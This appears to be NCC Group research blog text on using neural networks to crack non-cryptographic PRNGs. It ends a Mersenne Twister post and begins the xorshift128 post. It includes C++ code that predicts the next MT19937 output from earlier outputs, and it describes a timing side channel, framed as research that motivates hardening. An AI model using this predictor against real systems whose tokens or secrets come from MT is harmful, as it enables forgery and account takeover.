3.1.5.2 The Logic Closed-Form from the State Twisting Model Output

After creating a model that can replicate the twist operation of the states, we would like to see if we can possibly get to the logic closed form using the trained model. Of course, we can derive the closed-form by building all the 65bit input variations and testing each input combination’s outputs (2^65) and derive the closed-form. But this approach is tedious and requires lots of evaluations. Instead, we can test the effect of each input on each output separately. This can be done by using the training set and sticking each input bit individually, one time at 0 and one time at 1, and see which bits in the output are affected. This will show how which bits in the inputs affecting each bit in the output. For example, when we checked the first input, which corresponds to MSB of the first state, we found it only affects bit 30 in the output. The following table shows the effect of each input bit on each output bit:

Input Bits Output Bits
0   [30]
1   [0, 1, 2, 3, 4, 6, 7, 12, 13, 15, 19, 24, 27, 28, 31]
2   [0]
3   [1]
4   [2]
5   [3]
6   [4]
7   [5]
8   [6]
9   [7]
10   [8]
11   [9]
12   [10]
13   [11]
14   [12]
15   [13]
16   [14]
17   [15]
18   [16]
19   [17]
20   [18]
21   [19]
22   [20]
23   [21]
24   [22]
25   [23]
26   [24]
27   [25]
28   [26]
29   [27]
30   [28]
31   [29]
32   []
33   [0]
34   [1]
35   [2]
36   [3]
37   [4]
38   [5]
39   [6]
40   [7]
41   [8]
42   [9]
43   [10]
44   [11]
45   [12]
46   [13]
47   [14]
48   [15]
49   [16]
50   [17]
51   [18]
52   [19]
53   [20]
54   [21]
55   [22]
56   [23]
57   [24]
58   [25]
59   [26]
60   [27]
61   [28]
62   [29]
63   [30]
64   [31]

We can see that inputs 33 to 64, which corresponds to the last state, are affecting bits 0 to 31 in the output. We can also see that inputs 2 to 31, which corresponds to the second state from bit 1 to bit 30 (ignoring the LSB and MSB), affect bits 0 to 29 in the output. And as we know, we are using the XOR logic function in the state evaluation. We can formalize the closed-form as follows (ignoring bit 0 and bit 1 in the input for now):

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1)

This formula is so close to the result. We need to add the effect of input bits 0 and 1. For input number 0, which corresponds to the first state MSB, it is affecting bit 30. Hence we can update the above closed-form to be:

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1) ^ ((MT[i - 624] & 0x80000000) << 1)

Lastly, the first bit in the input, which corresponds to the second state LSB, affects 15 bits in the output. As we are using it in an XOR function, if this bit is 0, it does not affect the output, but if it has a value of one, it will affect all the listed 15bits (by XORing them). If we formulate these 15 bits into a hexadecimal value, we will get 0x9908B0DF (which corresponds to the constant a in MT19937). Then we can include this to the closed-form as follows:

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1) ^ ((MT[i - 624] & 0x80000000) << 1) ^ ((MT[i - 623] & 1) * 0x9908B0DF)

So, if the LSB of the second state is 0, the result of the ANDing will be 0, and hence the multiplication will result in 0. But if the LSB of the second state is 1, the result of the ANDing will be 1, and hence the multiplication will result in 0x9908B0DF. This is equivalent to the if-condition in the code listing. We can rewrite the above equation to use the circular buffer as follows:

          MT[i] = MT[(i + 397) % 624] ^ ((MT[(i + 1) % 624] & 0x7FFFFFFF) >> 1) ^ ((MT[i] & 0x80000000) << 1) ^ ((MT[(i + 1) % 624] & 1) * 0x9908B0DF)

Now let’s check how to reverse the tempered numbers to the internal states using an ML model.

3.2 Using NN for State Tempering

We plan to train a neural network model for this phase to reverse the state tempering introduced in the code listing from line 10 to line 20. As we can see, a series of XORing and shifting is done to the state at the current index to generate the random number. So, we have updated the code to generate the state before and after the state tempering to be used as inputs and outputs for the Neural network.

3.2.1 Data Preparation

We have generated a sequence of 5,000,000 32 bit words of states and their tempered values. Then we used the tempered states as inputs and the original states as outputs. This would create a 5 million records dataset. Then we split the data into training and testing sets, with only 100,000 records for the test set, and the rest of the data is used for training.

3.2.2 Neural Network Model Design

Our proposed model would have 32 inputs in the input layer to represent the tempered state values and 32 outputs in the output layer to represent the original 32-bit state. The main hyperparameter that we need to decide is the number of neurons/nodes and hidden layers. We have tested different models’ structures with a different number of hidden layers and neurons in each layer, similar to what we did in the NN model before. We also used the smallest model structure that has the most promising result. Hence, our neural network structure ended up with the following model structure (the input layer is ignored):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 640)               21120     
_________________________________________________________________
dense_1 (Dense)              (None, 32)                20512     
=================================================================
Total params: 41,632
Trainable params: 41,632
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of the parameters (weights and biases) of the hidden layer is only 21,120 (32×640 weights + 640 biases), and the number of the parameters of the output layer is 20,512 (640×32 weights + 32 biases), which gets to a total of 41,632 parameters to train. We can notice that this model is much bigger than the model for twisting as the operations done in tempering is much more complex than the operations done there. Similarly, the hidden layer activation function is relu, while the output layer activation function is sigmoid as we expect it to be a binary output. Here is the summary of the model parameters:

Tempering Model
Model Type Dense Network
#Layers 2
#Neurons 672 Dense
#Trainable Parameters 41,632
Activation Functions Hidden Layer: relu
Output Layer: sigmoid
Loss Function binary_crossentropy

3.2.3 Model Results

After manual tweaking of the model architecture, we have trained a model that has achieved 100% bitwise accuracy for both the training and testing sets. To be more confident about what we have achieved, we have generated a new sample of 1000,000 states and tempered states using a different seed than those used to generate the previous data. We got the same result of 100% bitwise accuracy when we tested with the newly generated data.

This means that the model has learned the exact inverse formula that relates each tempered state to its original state. Hence, we can use this model to reverse the generated numbers corresponding to the internal states we need for the first model. Then we can use the twisting model to get the new state. Then, we can use the normal tempering step to get to the new output. But before we get to that, let’s do a model deep dive.

3.2.4 Model Deep Dive

This section will deep dive into the model to understand more what it has learned from the State relations data and if it matches our expectations. 

3.2.4.1 Model Layers Connections

After training the model, we wanted to test if any bits are not used or are less connected. The following figure shows the weights connecting each input, in x-axes, to the 640 hidden nodes in the hidden layer (each point represents a hidden node weight):

As we can see, each input bit is connected to many hidden nodes, which implies that each bit in the input has more or less weight like others. We also plot in the following figure the connections between the hidden layer and the output layer:

The same observation can be taken from the previous figure, except that maybe bits 29 and 30 are less connected than others, but they are still well connected to many hidden nodes.

3.2.4.2 The Logic Closed-Form from the State Tempering Model Output

In the same way, we did with the first model, we can derive a closed-form logic expression that reverses the tempering using the model output. But, instead of doing so, we can derive a closed-form logic expression that uses the generated numbers at the positions mentioned in the first part to reverse them to the internal states, generate the new states and then generate the new number in one step. So, we plan to connect three models of the reverse tempering models to one model that generates the new state and then temper the output to get to the newly generated number as shown in the following figure:

Now we have 3 x 32 bits inputs and 32 bits output. Using the same approach described before, we can test the effect of each input on each output separately. This will show how each bit in the input bits affecting each bit in the output bits. The following table shows the input-output relations:

Input Index Input Bits Output Bits
0 0   []
0 1   []
0 2   [1, 8, 12, 19, 26, 30]
0 3   []
0 4   []
0 5   []
0 6   []
0 7   []
0 8   []
0 9   [1, 8, 12, 19, 26, 30]
0 10   []
0 11   []
0 12   []
0 13   []
0 14   []
0 15   []
0 16   [1, 8, 12, 19, 26, 30]
0 17   [1, 8, 12, 19, 26, 30]
0 18   []
0 19   []
0 20   [1, 8, 12, 19, 26, 30]
0 21   []
0 22   []
0 23   []
0 24   [1, 8, 12, 19, 26, 30]
0 25   []
0 26   []
0 27   [1, 8, 12, 19, 26, 30]
0 28   []
0 29   []
0 30   []
0 31   [1, 8, 12, 19, 26, 30]
1 0   [3, 5, 7, 9, 11, 14, 15, 16, 17, 18, 23, 25, 26, 27, 28, 29, 30, 31]
1 1   [0, 4, 7, 22]
1 2   [13, 16, 19, 26, 31]
1 3   [2, 6, 24]
1 4   [0, 3, 7, 10, 18, 25]
1 5   [4, 7, 8, 11, 25, 26]
1 6   [5, 9, 12, 27]
1 7   [5, 7, 9, 10, 11, 14, 15, 16, 17, 18, 21, 23, 25, 26, 27, 29, 30, 31]
1 8   [7, 11, 14, 29]
1 9   [1, 19, 26]
1 10   [9, 13, 31]
1 11   [2, 3, 5, 7, 9, 10, 11, 13, 14, 15, 16, 18, 20, 23, 24, 25, 26, 27, 28, 29, 30, 31]
1 12   [7, 11, 25]
1 13   [1, 9, 12, 19, 27]
1 14   [2, 10, 13, 20, 28]
1 15   [3, 14, 21]
1 16   [1, 8, 12, 15, 19, 26, 30]
1 17   [1, 5, 8, 13, 16, 19, 23, 26, 31]
1 18   [3, 5, 6, 7, 9, 11, 14, 15, 16, 18, 23, 24, 25, 26, 27, 28, 29, 30, 31]
1 19   [4, 18, 22, 25]
1 20   [1, 13, 16, 26, 31]
1 21   [6, 20, 24]
1 22   [0, 2, 3, 5, 6, 9, 11, 13, 14, 15, 16, 17, 20, 21, 23, 26, 27, 29, 30, 31]
1 23   [7, 8, 11, 22, 25, 26]
1 24   [1, 8, 9, 12, 19, 23, 26, 27]
1 25   [5, 6, 7, 9, 10, 11, 13, 14, 15, 16, 17, 18, 21, 23, 24, 25, 26, 27, 29, 30]
1 26   [11, 14, 25, 29]
1 27   [1, 8, 19]
1 28   [13, 27, 31]
1 29   [2, 3, 5, 7, 9, 11, 13, 14, 15, 16, 18, 20, 23, 24, 25, 26, 27, 29, 30, 31]
1 30   [7, 25, 29]
1 31   [8, 9, 12, 26, 27]
2 0   [0]
2 1   [1]
2 2   [2]
2 3   [3]
2 4   [4]
2 5   [5]
2 6   [6]
2 7   [7]
2 8   [8]
2 9   [9]
2 10   [10]
2 11   [11]
2 12   [12]
2 13   [13]
2 14   [14]
2 15   [15]
2 16   [16]
2 17   [17]
2 18   [18]
2 19   [19]
2 20   [20]
2 21   [21]
2 22   [22]
2 23   [23]
2 24   [24]
2 25   [25]
2 26   [26]
2 27   [27]
2 28   [28]
2 29   [29]
2 30   [30]
2 31   [31]

As we can see, each bit in the third input affects the same bit in order in the output. Also, we can notice that only 8 bits in the first input affect the same 6 bits in the output. But for the second input, each bit is affecting several bits. Although we can write a closed-form logic expression for this, we would write a code instead.

The following code implements a C++ function that can use three generated numbers (at specific locations) to generate the next number:

uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

uint gen_new_number(uint MT_624, uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);
    
    MT_624 &= 0x89130204;
    MT_624 ^= MT_624 >> 16;
    MT_624 ^= MT_624 >> 8;
    MT_624 ^= MT_624 >> 4;
    MT_624 ^= MT_624 >> 2;
    MT_624 ^= MT_624 >> 1;
    r ^= (MT_624 & 1) * 0x44081102;
    
    r ^= MT_227;
    return r;
}

We have tested this code by using the standard MT library in C to generate the sequence of the random numbers and match the generated numbers from the function with the next generated number from the library. The output was 100% matching for several millions of generated numbers with different seeds.

3.2.4.3 Further Improvement

We have seen in the previous section that we can use three generated numbers to generate the new number in the sequence. But we noticed that we only need 8 bits from the first number, which we XOR, and if the result of the XORing of them is one, we XOR the result with a constant, 0x44081102. Based on this observation, we can instead ignore the first number altogether and generate two possible output values, with or without XORing the result with 0x44081102. Here is the code segment for the new function.

#include<tuple>
  
using namespace std;

uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

tuple <uint, uint> gen_new_number(uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);
    
    r ^= MT_227;
    return make_tuple(r, r^0x44081102);
}

4. Improving MT algorithm

We have shown in the previous sections how to use ML to crack the MT algorithm and use only two or three numbers to predict the following number in the sequence. In this section, we will discuss two issues with the MT algorithm and how to improve them. Studying those issues can be particularly useful when MT is used as a part of cryptographically-secure PRNG, like in CryptMT. CryptMT uses Mersenne Twister internally, and it was developed by Matsumoto, Nishimura, Mariko Hagita, and Mutsuo Saito [2].

4.1 Normalizing the Runtime

As we described in Section 2, MT consist of two steps, twisting and tempering. Although the tempering step is applied on each step, the twisting step is only used when we exhaust all the states, and we need to twist the state array to create a new internal state. That is OK, algorithmically, but from the cybersecurity point of view, this is problematic. It makes the algorithm vulnerable to a different type of attack, namely a timing side-channel attack. In this attack, the attacker can determine when the state is being twisted by monitoring the runtime of each generated number, and when it is much longer, the start of the new state can be guessed. The following figure shows an example of the runtime for the first 10,000 generated numbers using MT:

We can clearly see that every 624 iterations, the runtime of the MT algorithm increases significantly due to the state-twisting evaluation. Hence, the attacker can easily determine the start of the state twisting by setting a threshold of 0.4 ms of the generated numbers. Fortunately, this issue can be resolved by updating the internal state every time we generate a new number using the progressive formula we have created earlier. Using this approach, we have updated the code for MT and measured the runtime again, and here is the result:

We can see that the runtime of the algorithm is now normalized across all iterations. Of course, we checked the output of both MT implementations, and they got the exact sequences. Also, when we evaluated the mean of the runtime of both MT implementations over millions of numbers generated, the new approach is a little more efficient but has a much smaller standard deviation.

4.2 Changing the Internal State as a Whole

We showed in the previous section that the MT twist step is equivalent to changing the internal state progressively. This is the main reason we were able to build a machine learning that can correlate a generated output from MT to three previous outputs. In this section, we suggest changing the algorithm slightly to overcome this weakness. The idea is to apply the twisting step on the old state at once and generate the new state from it. This can be achieved by doing the twist step in a new state array and swap the new state with the old one after twisting all the states. This will make the state prediction more complex as different states will use different distances for evaluating the new state. For example, all the new states from 0 to 226 will use the old states from 397 to 623, which are 397 apart. And all the new states from 227 to 623 will be using the value of the old states from 0 to 396, which are 227 apart. This slight change will generate a more resilient PRNG for the above-suggested attack, as any generated output can be either 227  or 397 away from the output it depends on as we don’t know the position of the generated number (whether it is in the first 227 numbers from the state or in the last 397 ones). Although this will generate a different sequence, the new state’s prediction from the old ones will be harder. Of course, this suggestion needs to be reviewed more deeply to check the other properties of the outcome PRNG, such as periodicity.

5. Conclusion

In this series of posts, we have shared the methodology of cracking two of the well-known (non-cryptographic) Pseudo-Random Number Generators, namely xorshift128 and Mersenne Twister. In the first post, we showed how we could use a simple machine learning model to learn the internal pattern in the sequence of the generated numbers. In this post, we extended this work by applying ML techniques to a more complex PRNG. We also showed how to split the problem into two simpler problems, and we trained two different NN models to tackle each problem separately. Then we used the two models together to predict the next sequence number in the sequence using three generated numbers. Also, we have shown how to deep dive into the models and understand how they work internally and how to use them to create a closed-form code that can break the Mersenne Twister (MT) PRNG. At last, we shared two possible techniques to improve the MT algorithm security-wise as a means of thinking through the algorithmic improvements that can be made based on patterns identified by deep learning (while still recognizing that these changes do not themselves constitute sufficient security improvements for MT to be itself used where cryptographic randomness is required).

The python code for training and testing the model outlined in this post is shared in this repo in a form of a Jupyter notebook. Please note that this code is based on top of an old version of the code shared in the post [3] and the changes that are done in part 1 of this post.

Acknowledgment

I would like to thank my colleagues in NCC Group for their help and support and for giving valuable feedback the especially in the crypto/cybersecurity parts. Here are a few names that I would like to thank explicitly: Ollie Whitehouse, Jennifer Fernick, Chris Anley, Thomas Pornin, Eric Schorn, and Eli Sohl.

References

[1] Mike Shema, Chapter 7 – Leveraging Platform Weaknesses, Hacking Web Apps, Syngress, 2012, Pages 209-238, ISBN 9781597499514, https://doi.org/10.1016/B978-1-59-749951-4.00007-2.

[2] Matsumoto, Makoto; Nishimura, Takuji; Hagita, Mariko; Saito, Mutsuo (2005). “Cryptographic Mersenne Twister and Fubuki Stream/Block Cipher” (PDF).

[3] Everyone Talks About Insecure Randomness, But Nobody Does Anything About It

✇ NCC Group Research

Cracking Random Number Generators using Machine Learning – Part 1: xorshift128

By: Mostafa Hassan

Outline

1. Introduction

This blog post proposes an approach to crack Pseudo-Random Number Generators (PRNGs) using machine learning. By cracking here, we mean that we can predict the sequence of the random numbers using previously generated numbers without the knowledge of the seed. We started by breaking a simple PRNG, namely XORShift, following the lead of the post published in [1]. We simplified the structure of the neural network model from the one proposed in that post. Also, we have achieved a higher accuracy. This blog aims to show how to train a machine learning model that can reach 100% accuracy in generating random numbers without knowing the seed. And we also deep dive into the trained model to show how it worked and extract useful information from it.

In the mentioned blog post [1], the author replicated the xorshift128 PRNG sequence with high accuracy without having the PRNG seed using a deep learning model. After training, the model can use any consecutive four generated numbers to replicate the same sequence of the PRNG with bitwise accuracy greater than 95%. The details of this experiment’s implementation and the best-trained model can be found in [2]

At first glance, this seemed a bit counter-intuitive as the whole idea behind machine learning algorithms is to learn from the patterns in the data to perform a specific task, ranging from supervised, unsupervised to reinforcement learning. On the other hand, the pseudo-random number generators’ main idea is to generate random sequences and, hence, these sequences should not follow any pattern. So, it did not make any sense (at the beginning) to train an ML model, which learns from the data patterns, from PRNG that should not follow any pattern. Not only learn, but also get a 95% bitwise accuracy, which means that the model will generate the PRNG’s exact output and only gets, on average, two bits wrong. So, how is this possible? And why can machine learning crack the PRNG? Can we even get better than the 95% bitwise accuracy? That is what we are going to discuss in the rest of this article. Let’s start first by examining the xorshift128 algorithm.

** Editor’s Note: How does this relate to security? While this research looks at a non-cryptographic PRNG, we are interested, generically, in understanding how deep learning-based approaches to finding latent patterns within functions presumed to be generating random output could work, as a prerequisite to attempting to use deep learning to find previously-unknown patterns in cryptographic (P)RNGs, as this could potentially serve as an interesting supplementary method for cryptanalysis of these functions. Here, we show our work in beginning to explore this space. **

2. How does xorshift128 PRNG work?

To understand whether machine learning (ML) could crack the xorshift128 PRNG, we need to comprehend how it works and check whether it is following any patterns or not. Let’s start by digging into its implementation of the xorshift128 PRNG algorithm to learn how it works. The code implementation of this algorithm can be found on Wikipedia and shared in [2]. Here is the function that was used in the repo to generate the PRNG sequence (which is used to train the ML model):

def xorshift128():
    '''xorshift
    https://ja.wikipedia.org/wiki/Xorshift
    '''

    x = 123456789
    y = 362436069
    z = 521288629
    w = 88675123

    def _random():
        nonlocal x, y, z, w
        t = x ^ ((x << 11) & 0xFFFFFFFF)  # 32bit
        x, y, z = y, z, w
        w = (w ^ (w >> 19)) ^ (t ^ (t >> 8))
        return w

    return _random

As we can see from the code, the implementation is straightforward. It has four internal numbers, x, y, z, and w, representing the seed and the state of the PRNG simultaneously. Of course, we can update this generator implementation to provide the seed with a different function call instead of hardcoding it. Every time we call the generator, it will shift the internal variables as follows: y → x, z → y, and w → z. The new value of w is evaluated by applying some bit manipulations (shifts and XORs) to the old values of x and w. The new w is then returned as the new random number output of the random number generator. Let’s call the function output, o

Using this code, we can derive the logical expression of each bit of the output, which leads us to the following output bits representations of the output, o:

O0 = W0 ^ W19 ^ X0 ^ X8

O1 = W1 ^ W20 ^ X1 ^ X9

.

.

O31 = W31 ^ X20 ^ X31

where Oi is the ith bit of the output, and the sign ^ is a bitwise XOR. The schematic diagram of this algorithm is shown below:

We can notice from this algorithm that we only need w and x to generate the next random number output. Of course, we need y and z to generate the random numbers afterward, but the value of o depends only on x and w.

So after understanding the algorithm, we can see the simple relation between the last four generated numbers and the next one. Hence, if we know the last four generated numbers from this PRNG, we can use the algorithm to generate the whole sequence; this could be the main reason why this algorithm is not cryptographically secure. Although the algorithm-generated numbers seem to be random with no clear relations between them, an attacker with the knowledge of the algorithm can predict the whole sequence of xorshift128 using any four consecutive generated numbers. As the purpose of this post is to show how an ML model can learn the hidden relations in a sample PRNG, we will assume that we only know that there is some relation between the newly generated number and its last four ones without knowing the implementation of the algorithm.

Returning to the main question slightly: Can machine learning algorithms learn to generate the xorshift128 PRNG sequence without knowing its implementation using only the last four inputs?

To answer this question, let’s first introduce the Artificial Neural Networks (ANN or NN for short) and how they may model the XOR gates.

3. Neural Networks and XOR gates

Neural Networks (NN), aka Multi-Layer Perceptron (MLP), is one of the most commonly used machine learning algorithms. It consists of small computing units, called neurons or perceptrons, organized into sets of unconnected neurons, called layers. The layers are interconnected to form paths from the inputs of the NN to its outputs. The following figure shows a simple example of 2 layers NN (the input layer is not counted). The details of the mathematical formulation of the NN are out of the scope of this article.

While the NN is being trained from the input data, the connections between the neurons, aka the weights, either get stronger (high positive or low negative values) to represent a high positively/negatively strong connection between two neurons or get weaker (close to 0) to represent that there is no connection at all. At the end of the training, these connections/weights encode the knowledge stored in the NN model. 

One example used to describe how NNs handle nonlinear data is NN’s use to model a two-input XOR gate. The main reason for choosing the two-input XOR function is that although it is simple, its outputs are not linearly separable [3]. Hence, using an NN with two layers is the best way to represent the two input XOR gate. The following figure (from Abhranil blog [3]) shows how we can use a two-layer neural network to imitate a two-input XOR. The numbers on the lines are the weights, and the number inside the nodes are the thresholds (negative bias) and assuming using a step activation function. 

In case we have more than two inputs for XOR, we will need to increase the number of the nodes in the hidden layer (the layer in the middle) to make it possible to represents the other components of the XOR. 

4. Using Neural Networks to model the xorshift128 PRNG

Based on what we discussed in the previous section and our understanding of how the xorshift128 PRNG algorithm works, it makes sense now that ML can learn the patterns the xorshift128 PRNG algorithm follows. We can also now decide how to structure the neural network model to replicate the xorshift128 PRNG algorithm. More specifically, we will use a dense neural network with only one hidden layer as that is all we need to represent any set of XOR functions as implemented in the xorshift128 algorithm. Contrary to the model suggested in [1], we don’t see any reason to use a complex model like LSTM (“Long short-term memory,” a type of recurrent neural network), especially that all output bits are directly connected to sets of the input bits with XOR functions, as we have shown earlier, and there is no need for preserving internal states, as it is done in the LSTM.

4.1 Neural Network Model Design 

Our proposed model would have 128 inputs in the input layer to represent the last four generated integer numbers, 32-bit each, and 32 outputs in the output layer to express the next 32-bit random generated number. The main hyperparameter that we need to decide is the number of neurons/nodes in the hidden layer. We don’t want a few nodes that can not represent all the XOR functions terms, and at the same time, we don’t want to use a vast number of nodes that would not be used and would complex the model and increase the training time. In this case, and based on the number of inputs, outputs, and the XOR functions complexity, we made an educated guess and used 1024 hidden nodes for the hidden layer. Hence, our neural network structure is as follows (the input layer is ignored):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 1024)              132096    
_________________________________________________________________
dense_1 (Dense)              (None, 32)                32800     
=================================================================
Total params: 164,896
Trainable params: 164,896
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of the parameters (weights and biases) of the hidden layer is 132,096 (128×1024 weights + 1024 biases), and the number of the parameters of the output layer is 32,800 (1024×32 weights + 32 biases), which gets to a total of 164,896 parameters to train. Comparing to the model used in [1]:

_________________________________________________________________
Layer (type) Output Shape Param # ================================================================= lstm (LSTM) (None, 1024) 4329472 _________________________________________________________________ dense (Dense) (None, 512) 524800 _________________________________________________________________ dense_1 (Dense) (None, 512) 262656 _________________________________________________________________ dense_2 (Dense) (None, 512) 262656 _________________________________________________________________ dense_3 (Dense) (None, 512) 262656 _________________________________________________________________ dense_4 (Dense) (None, 512) 262656 _________________________________________________________________ dense_5 (Dense) (None, 32) 16416 ================================================================= Total params: 5,921,312 Trainable params: 5,921,312 Non-trainable params: 0 _________________________________________________________________

This complex model has around 6 million parameters to train, which will make the model training harder and take a much longer time to get good results. It could also easily be stuck in one of the local minima in that huge 6 million dimension space. Additionally, storing this model and serving it later will use 36 times the space needed to store/serve our model. Furthermore, the number of the model parameters affects the amount of required data to train the model; the more parameters, the more input data is needed to train it.

Another issue with that model is the loss function used. Our target is to get as many correct bits as possible; hence, the most suitable loss function to be used in this case is “binary_crossentropy,” not “mse.” Without getting into the math of both of these loss functions, it is sufficient to say that we don’t care if the output is 0.8, 0.9, or even 100. All we care about is that the value crosses some threshold to be considered one or not to be considered zero. Another non-optimal choice of the parameter in that model is the activation function of the output layer.  As the output layer comprises 32 neurons, each representing a bit whose value should always be 0 or 1, the most appropriate activation function for these types of nodes is usually a sigmoid function. On the contrary, that model uses a linear activation function to output any value from -inf to inf. Of course, we can threshold those values to convert them to zeros and ones, but the training of that model will be more challenging and take more time. 

For the rest of the hyperparameters, we have used the same as in the model in [1]. Also, we used the same input sample as the other model, which consists of around 2 million random numbers sampled from the above PRNG function for training, and 10,000 random numbers for testing. Training and testing random number samples are formed into a quadrable of consequent random numbers to be used as inputs to the model, and the next random number is used as an output to the model. It is worth mentioning that we don’t think we need that amount of data to reach the performance we reached; we just tried to be consistent with the referenced article. Later, we can experiment to determine the minimum data size sufficient to produce a well-trained model. The following table summarises the model parameters/ hyperparameters for our model in comparison with the model proposed in [1]:

NN Model in [1] Our Model
Model Type LSTM and Dense Network Dense Network
#Layers 7 2
#Neurons 1024 LSTM
2592 Dense 
1056 Dense
#Trainable Parameters 5,921,312
(4,329,472 only from the LSTM layer)
164,896
Activation Functions Hidden Layers: relu
Output Layer: linear
Hidden Layer: relu
Output Layer: sigmoid
Loss Function mse binary_crossentropy
Comparison between our proposed model and the model from the post in [1]

4.2 Model Results

After a few hours of model training and optimizing the hyperparameters, the NN model has achieved 100% bitwise training accuracy! Of course, we ran the test set through the model, and we got the same result with 100% bitwise accuracy. To be more confident about what we have achieved, we have generated a new sample of 100,000 random numbers with a different seed than those used to generate the previous data, and we got the same result of 100% bitwise accuracy. It is worth mentioning that although the referenced article achieved 95%+ bitwise accuracy, which looks like a promising result. However, when we evaluated the model accuracy (versus bitwise accuracy), which is its ability to generate the exact next random numbers without any bits flipped, we found that the model’s accuracy dropped to around 26%. Compared to our model, we have 100% accuracy.  The 95%+ bitwise is not failing only on 2 bits as it may appear (95% of 32 bit is less than 2), but rather these 5% errors are scattered throughout 14 bits. In other words, although the referenced model has bitwise accuracy of 95%+, 18 bits only would be 100% correct, and on average, 2 bits out of the rest of the 14 bits would be altered by the model.

The following table summarizes the two model comparisons:

NN Model in [1] Our Model
Bitwise Accuracy 95% + 100%
Accuracy 26% 100%
Bits could be Flipped (out of 32) 14 0
Models accuracy comparison

In machine learning, getting 100% accuracy is usually not good news. It normally means either we don’t have a good representation of the whole dataset, we are overfitting the model for the sample data, or the problem is deterministic that it does not need machine learning. In our case, it is close to the third choice. The xorshift128 PRNG algorithm is deterministic; we need to know which input bits are used to generate output bits, but the function to connect them, XOR, is already known. So, in a way, this algorithm is easy for machine learning to crack. So, for this problem, getting a 100% accurate model means that the ML model has learned the bits connection mappings between the input and output bits. So, if we get any consequent four random numbers generated from this algorithm, the model will generate the random numbers’ exact sequence as the algorithm does, without knowing the seed.

4.3 Model Deep Dive

This section will deep dive into the model to understand more what it has learned from the PRNG data and if it matches our expectations. 

4.3.1 Model First Layer Connections

As discussed in section 2, the xorshift128 PRNG uses the last four generated numbers to generate the new random number. More specifically, the implementation of xorshift128 PRNG only uses the first and last numbers of the four, called w and x, to generate the new random number, o. So, we want to check the weights that connect the 128 inputs, the last four generated numbers merged, from the input layer to the hidden layer, the 1024 hidden nodes, of our trained model to see how strong they are connected and hence we can verify which bits are used to generate the outputs. The following figure shows the value of weights on the y-axes connecting each input, in x-axes, to the 1024 hidden nodes in the hidden layer. In other words, each dot on the graph represents the weight from any of the hidden nodes to the input in the x-axes:

As we can see, very few of the hidden nodes are connected to one of the inputs, where the weight is greater than ~2.5 or less than ~-2.5. The rest of the nodes with low weights between -2 and 2 can be considered not connected. We can also notice that inputs between bit 32 and 95 are not connected to any hidden layers. This is because what we stated earlier that the implementation of xorshift128 PRNG uses only x, bits from 0 to 31, and w, bits from 96 to 127, from the inputs, and the other two inputs, y, and z representing bits from 32 to 95, are not utilized to generate the output, and that is exactly what the model has learned. This implies that the model has learned that pattern accurately from the data given in the training phase.

4.3.2 Model Output Parsing

Similar to what we did in the previous section, the following figure shows the weights connecting each output, in x-axes, to the 1024 hidden nodes in the hidden layer:

Like our previous observation, each output bit is connected only to a very few nodes from the hidden layer, maybe except bit 11, which is less decisive and may need more training to be less error-prone. What we want to examine now is how these output bits are connected to the input bits. We will explore only the first bit here, but we can do the rest the same way. If we focus only on bit 0 on the figure, we can see that it is connected only to five nodes from the hidden layers, two with positive weights and three with negative weights, as shown below:

Those connected hidden nodes are 120, 344, 395, 553, and 788. Although these nodes look random, if we plot their connection to the inputs, we get the following figure:

As we can see, very few bits affect those hidden nodes, which we circled in the figure. They are bits 0, 8, 96, and 115, which if we modulo them by 32, we get bits 0 and 8 from the first number, x, and 0 and 19 from the fourth number, w. This matches the xorshift128 PRNG function we derived in section 2, the first bit of the output is the XOR of these bits, O0 = W0 ^ W19 ^ X0 ^ X8.  We expect the five hidden nodes with the one output node to resemble the functionality of an XOR  of these four input bits. Hence, the ML model can learn the XOR function of any set of arbitrary input bits if given enough training data.

5. Creating a machine-learning-resistant version of xorshift128

After analyzing how the xorshift128 PRNG works and how NN can easily crack it, we can suggest a simple update to the algorithm, making it much harder to break using ML. The idea is to introduce another variable in the seed that will decide:

  1. Which variables to use out of x, y, z, and w to generate o.
  2. How many bits to shift each of these variables.
  3. Which direction to shift these variables, either left or right.

This can be binary encoded in less than 32 bits. For example, only w and x variables generate the output in the sample code shown earlier, which can be binary encoded as 1001. The variable w is shifted 11 bits to the right, which can be binary encoded as 010110, where the least significant bit, 0, represents the right direction. The variable x is shifted 19 bits to the right, which can be binary encoded as 100111, where the least significant bit, 1, represents the left direction. This representation will take 4 bits + 4×6 bits = 28 bits. For sure, we need to make sure that the 4 bits that select the variables do not have these values: 0000, 0001, 0010, 0100, and 1000, as they would select one or no variable to XOR. 

